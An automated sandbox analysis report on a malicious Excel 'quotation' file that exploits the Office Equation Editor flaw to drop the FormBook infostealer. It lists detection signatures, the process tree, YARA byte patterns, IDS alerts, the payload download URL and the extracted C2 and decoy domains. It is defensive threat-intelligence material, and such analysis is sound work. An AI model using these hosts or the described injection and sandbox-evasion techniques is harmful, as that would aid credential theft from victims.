Play interactive tour

Edit tour

Windows Analysis Report (QUOTATION)B-RUS-20061REV2.xlsx

Overview

General Information

Sample Name:	(QUOTATION)B-RUS-20061REV2.xlsx
Analysis ID:	491355
MD5:	ecd068fb962c5a9452a6f22c0725521c
SHA1:	fdf1a902181584d47cb1aed7ac2ca333dcc62e5e
SHA256:	3c3d0f13af1ccf38e72804d40b87dc215813ff6b36a20137d48c4a565c5a5c2e
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Droppers Exploiting CVE-2017-11882

System process connects to network (likely due to code injection or exploit)

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Modifies the prolog of user mode functions (user mode inline hooks)

Injects a PE file into a foreign processes

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Checks if the current process is being debugged

Drops PE files to the user directory

Dropped file seen in connection with other malware

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 1928 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 2792 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2796 cmdline: 'C:\Users\Public\vbc.exe' MD5: 50568FB6133EE4ED721EE46A3C0A9E98)

vbc.exe (PID: 2024 cmdline: C:\Users\Public\vbc.exe MD5: 50568FB6133EE4ED721EE46A3C0A9E98)

explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

autofmt.exe (PID: 2820 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: A475B7BB0CCCFD848AA26075E81D7888)

msiexec.exe (PID: 2308 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 4315D6ECAE85024A0567DF2CB253B7B0)

cmd.exe (PID: 1124 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.odysseysailingsantorini.com/cmsr/"], "decoy": ["dahlia-dolls.com", "iamawife.com", "gardunomx.com", "roweelitetrucking.com", "asapvk.com", "strategieslimited.com", "healthyweathorganics.com", "wedding-gallery.net", "fastoffer.online", "biolab33.cloud", "los40delocta.com", "charliepaton.com", "jenpaddock.com", "zzmweb.com", "poetarts.com", "techwork4u.com", "tracylynpropp.com", "rkbodyfit.site", "migaleriapanama.com", "cosmostco.com", "johnsoncamping.com", "flowfinancialplanning.com", "xn--caamosdemexico-rnb.com", "plusqueindia.com", "wwwhyprr.com", "benimofis.com", "tandteutopia.com", "spaintravelvacation.com", "dear.services", "zhiwugongfang.com", "blogdavnc.com", "justicefundingexchange.com", "alphasecreweb.info", "xitechgroup.com", "kendalmountain.digital", "nieght.com", "pieter-janenmaaike.online", "myexclusiveshop.com", "love-potato.online", "mondebestglobal.com", "ranchlandconcierge.com", "southerngraphx.com", "pray4usa.info", "vilchesfinancial.com", "zelvio.store", "zenibusiness.com", "kindredhue.com", "californiatacosdinuba.com", "uncommonsolutionsllc.com", "easy-lah.com", "disciplesevents.com", "856380127.xyz", "zapzapgone.com", "paradisgrp.com", "programmerworks.info", "purchasesuite.com", "dorotajedrusik.com", "555999dy.com", "uvoyus.com", "utang.net", "elizabethhelma.com", "noseainsight.com", "simpleterior.com", "casatensina.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.466320044.00000000024B1000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x2675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x2777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x28ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x13dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x931a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x53f9:$sqlite3step: 68 34 1C 7B E1 0x550c:$sqlite3step: 68 34 1C 7B E1 0x5428:$sqlite3text: 68 38 2A 90 C5 0x554d:$sqlite3text: 68 38 2A 90 C5 0x543b:$sqlite3blob: 68 53 D8 7F 8C 0x5563:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x2675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x2777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x28ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x13dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x931a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x53f9:$sqlite3step: 68 34 1C 7B E1 0x550c:$sqlite3step: 68 34 1C 7B E1 0x5428:$sqlite3text: 68 38 2A 90 C5 0x554d:$sqlite3text: 68 38 2A 90 C5 0x543b:$sqlite3blob: 68 53 D8 7F 8C 0x5563:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x623d0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x6263a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1a9ec8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1aa132:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x6e15d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1b5c55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x6dc49:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1b5741:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x6e25f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1b5d57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x6e3d7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1b5ecf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x63052:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1aab4a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x6cec4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1b49bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x63d4b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab843:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x73dff:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x74e02:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x70ee1:$sqlite3step: 68 34 1C 7B E1 0x70ff4:$sqlite3step: 68 34 1C 7B E1 0x1b89d9:$sqlite3step: 68 34 1C 7B E1 0x1b8aec:$sqlite3step: 68 34 1C 7B E1 0x70f10:$sqlite3text: 68 38 2A 90 C5 0x71035:$sqlite3text: 68 38 2A 90 C5 0x1b8a08:$sqlite3text: 68 38 2A 90 C5 0x1b8b2d:$sqlite3text: 68 38 2A 90 C5 0x70f23:$sqlite3blob: 68 53 D8 7F 8C 0x7104b:$sqlite3blob: 68 53 D8 7F 8C 0x1b8a1b:$sqlite3blob: 68 53 D8 7F 8C 0x1b8b43:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: vbc.exe PID: 2796	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.vbc.exe.25b91f4.3.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
5.2.vbc.exe.400000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.vbc.exe.400000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.vbc.exe.400000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x175f9:$sqlite3step: 68 34 1C 7B E1 0x1770c:$sqlite3step: 68 34 1C 7B E1 0x17628:$sqlite3text: 68 38 2A 90 C5 0x1774d:$sqlite3text: 68 38 2A 90 C5

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 180.214.239.85, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2792, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2792, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2792, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2796

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.odysseysailingsantorini.com/cmsr/"], "decoy": ["dahlia-dolls.com", "iamawife.com", "gardunomx.com", "roweelitetrucking.com", "asapvk.com", "strategieslimited.com", "healthyweathorganics.com", "wedding-gallery.net", "fastoffer.online", "biolab33.cloud", "los40delocta.com", "charliepaton.com", "jenpaddock.com", "zzmweb.com", "poetarts.com", "techwork4u.com", "tracylynpropp.com", "rkbodyfit.site", "migaleriapanama.com", "cosmostco.com", "johnsoncamping.com", "flowfinancialplanning.com", "xn--caamosdemexico-rnb.com", "plusqueindia.com", "wwwhyprr.com", "benimofis.com", "tandteutopia.com", "spaintravelvacation.com", "dear.services", "zhiwugongfang.com", "blogdavnc.com", "justicefundingexchange.com", "alphasecreweb.info", "xitechgroup.com", "kendalmountain.digital", "nieght.com", "pieter-janenmaaike.online", "myexclusiveshop.com", "love-potato.online", "mondebestglobal.com", "ranchlandconcierge.com", "southerngraphx.com", "pray4usa.info", "vilchesfinancial.com", "zelvio.store", "zenibusiness.com", "kindredhue.com", "californiatacosdinuba.com", "uncommonsolutionsllc.com", "easy-lah.com", "disciplesevents.com", "856380127.xyz", "zapzapgone.com", "paradisgrp.com", "programmerworks.info", "purchasesuite.com", "dorotajedrusik.com", "555999dy.com", "uvoyus.com", "utang.net", "elizabethhelma.com", "noseainsight.com", "simpleterior.com", "casatensina.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: (QUOTATION)B-RUS-20061REV2.xlsx

ReversingLabs: Detection: 28%

Yara detected FormBook

Show sources

Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

Antivirus detection for URL or domain

Show sources

Source: http://180.214.239.85/service/rundll32.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exe	ReversingLabs: Detection: 13%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 13%

Source: 5.2.vbc.exe.400000.1.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: msiexec.pdb source: vbc.exe, 00000005.00000002.507251158.00000000007CA000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, msiexec.exe

Source: global traffic

DNS query: name: www.paradisgrp.com

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop ebx		5_2_00407AFA
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop edi		5_2_00417D59

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 180.214.239.85:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 180.214.239.85:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2022566 ET TROJAN Possible Malicious Macro EXE DL AlphaNumL 192.168.2.22:49165 -> 180.214.239.85:80
Source: Traffic	Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 180.214.239.85:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 128.65.195.232:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 128.65.195.232:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 128.65.195.232:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.paradisgrp.com
Source: C:\Windows\explorer.exe	Network Connect: 128.65.195.232 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.uvoyus.com

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.odysseysailingsantorini.com/cmsr/

Source: Joe Sandbox View	ASN Name: INFOMANIAK-ASCH INFOMANIAK-ASCH
Source: Joe Sandbox View	ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN

